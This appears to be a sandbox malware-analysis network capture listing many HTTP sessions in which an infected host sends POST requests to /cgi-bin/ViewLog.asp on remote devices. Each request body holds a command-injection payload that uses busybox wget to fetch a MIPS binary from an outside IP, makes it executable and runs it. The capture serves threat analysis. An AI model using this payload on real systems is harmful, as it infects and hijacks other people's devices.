                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              93192.168.2.145981831.54.151.998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.563138962 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:23.738253117 CET765INHTTP/1.0 404 Not Found !!!
                                              Cache-Control: no-cache, no-store, must-revalidate
                                              Pragma: no-cache
                                              Content-type: text/html
                                              <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>
                                              Data Raw:
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              94192.168.2.143320285.240.125.1798080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.578866005 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:23.786322117 CET458INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:15:22 GMT
                                              Server: Apache
                                              Content-Length: 226
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              95192.168.2.143564431.202.75.1508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.589685917 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              96192.168.2.143863885.236.173.1478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.601917028 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:23.836010933 CET544INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:15:21 GMT
                                              Server: Apache/2.2.8 (Win32) mod_perl/2.0.3 Perl/v5.8.7
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Content-Length: 189
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e c1 0e 82 30 10 44 ef 7c c5 ca 1d 16 0d c7 a6 07 05 22 09 22 31 d5 c4 23 d8 15 9a 20 45 5a 24 fe bd a0 17 8f b3 33 6f 66 d9 2a 3a ee c4 b5 88 61 2f 0e 19 14 e7 6d 96 ee c0 f5 10 d3 58 24 88 91 88 7e ce c6 0f 10 e3 dc e5 0e 6b ec a3 e5 ac a1 52 ce c2 2a db 12 0f 83 10 72 6d 21 d1 63 27 19 fe 8e 0e c3 6f 88 55 5a be 17 6e cd ff 32 b3 72 58 cf 45 43 30 d0 73 24 63 49 c2 f9 94 01 de 6a e5 55 aa c3 8b a2 29 d3 b5 5f 9a 1e a6 d2 40 37 c3 f7 05 06 dd 81 6d 94 01 43 c3 8b 06 9f 61 bf 8c 7d 67 e6 e2 e5 3d e7 03 7b f7 ab 8c d9 00 00 00
                                              Data Ascii: M0D|""1# EZ$3of*:a/mX$~kR*rm!c'oUZn2rXEC0s$cIjU)_@7mCa}g={


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              97192.168.2.144673694.121.154.2158080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.601973057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              98192.168.2.144547831.136.70.1948080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.938766956 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:24.520193100 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:25.640189886 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:28.008132935 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:32.615906954 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:41.575521946 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:01.286714077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:38.149092913 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              99192.168.2.146005031.200.118.1438080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.977437019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              100192.168.2.144911094.122.12.838080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.992229939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              101192.168.2.144222295.86.96.318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:24.005054951 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              102192.168.2.145334631.136.229.808080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:26.881285906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:30.056003094 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:36.199673891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:48.231241941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.574234962 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:02.724066973 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              103192.168.2.145346831.136.151.1058080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:26.881571054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
